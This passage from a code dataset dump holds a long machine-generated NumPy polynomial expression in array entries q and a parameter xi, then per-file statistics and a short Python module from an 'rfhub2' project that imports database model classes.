0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi)*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1), (4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0])*(-160351958.315909*xi**10*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (60131984.3684659*xi**9*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi)*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1), (4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) + 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0])*(-160351958.315909*xi**10*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (60131984.3684659*xi**9*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi)*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1), 0, 0, 0, 0, 0, 0, 0, 0, 0]])
| 46,477.666667
| 139,406
| 0.408777
| 39,521
| 139,433
| 1.442195
| 0.003821
| 0.228609
| 0.096005
| 0.115164
| 0.991491
| 0.991228
| 0.991228
| 0.99028
| 0.989964
| 0.988999
| 0
| 0.370182
| 0.176644
| 139,433
| 3
| 139,406
| 46,477.666667
| 0.126295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 17
|
bab0bb415c4dd63d7ef6409cd0071df8f0185a0a
| 138
|
py
|
Python
|
rfhub2/db/base.py
|
Wolfe1/rfhub2
|
7bc5bd95a5b80f0dec62211bc1771d11d604e01b
|
[
"Apache-2.0"
] | null | null | null |
rfhub2/db/base.py
|
Wolfe1/rfhub2
|
7bc5bd95a5b80f0dec62211bc1771d11d604e01b
|
[
"Apache-2.0"
] | null | null | null |
rfhub2/db/base.py
|
Wolfe1/rfhub2
|
7bc5bd95a5b80f0dec62211bc1771d11d604e01b
|
[
"Apache-2.0"
] | null | null | null |
from rfhub2.db.model.base_class import Base
from rfhub2.db.model.keyword import Keyword
from rfhub2.db.model.collection import Collection
| 34.5
| 49
| 0.847826
| 22
| 138
| 5.272727
| 0.409091
| 0.258621
| 0.310345
| 0.439655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02381
| 0.086957
| 138
| 3
| 50
| 46
| 0.896825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
bae81435bf6fa78f67a2883269a6dc6e792840f6
| 108
|
py
|
Python
|
mudi/ref/__init__.py
|
getzlab/mudi
|
eda170119708e59920c23a03834af915ecca24ce
|
[
"MIT"
] | 1
|
2021-11-04T00:08:00.000Z
|
2021-11-04T00:08:00.000Z
|
mudi/ref/__init__.py
|
getzlab/mudi
|
